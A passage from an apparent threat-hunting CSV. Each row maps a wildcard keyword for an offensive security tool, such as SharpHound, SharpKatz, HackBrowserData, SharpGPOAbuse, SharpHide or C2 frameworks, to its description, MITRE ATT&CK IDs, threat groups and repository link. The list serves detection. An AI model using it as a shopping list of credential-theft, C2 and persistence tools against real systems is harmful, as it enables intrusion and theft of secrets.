- T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*sharpgen.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*sharpgen.set_location*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*SharpGmailC2-main*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,1,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*SharpGPOAbuse*,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,1,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z -*SharpGPOAbuse*,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a users edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1204 - T1484 - T1556 - T1574 - T1562,TA0002 - 
TA0007,N/A,N/A,Exploitation tools,https://github.com/FSecureLABS/SharpGPOAbuse,1,1,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z -*SharpGPOAbuse.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpGPOAddComputer*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpGPOAddLocalAdmin*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpGPOAddUser*Manager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*Sharp-HackBrowserData*,offensive_tool_keyword,cobaltstrike,C# binary with embeded golang 
hack-browser-data,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData,1,1,N/A,10,10,84,15,2021-12-09T18:58:27Z,2020-12-06T12:28:47Z -*Sharp-HackBrowserData*,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,1,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z -*SharpHandler.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpHide.csproj*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,1,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*SharpHide.exe*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,1,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*SharpHide.sln*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,1,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*SharpHide-master*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,1,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*SharpHide-N*.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*SharpHose.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sharphound -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpHound-*.zip*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*sharphound*--stealth*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - 
TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*sharphound.*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*SharpHound.cna*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,1,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*SharpHound.exe*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. 
Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*SharpHound.exe*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,1,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*SharpHound.exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*SharpHound.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpHound.exe*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*SharpHound.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process 
of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*SharpHound.ps1*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,1,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*SharpHound.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*SharpHound.ps1*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*SharpHound.ps1*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*SharpHound.ps1*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*SharpHound2*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z 
-*Sharphound2.*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,1,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*SharpHound3*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*Sharphound-Aggressor*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,1,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*SharpHoundCommon.*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*SharpHoundCommonLib*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*sharpinline *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Sharpkatz*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z 
-*SharpKatz.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpKatz.exe*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*SharpkatzManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - 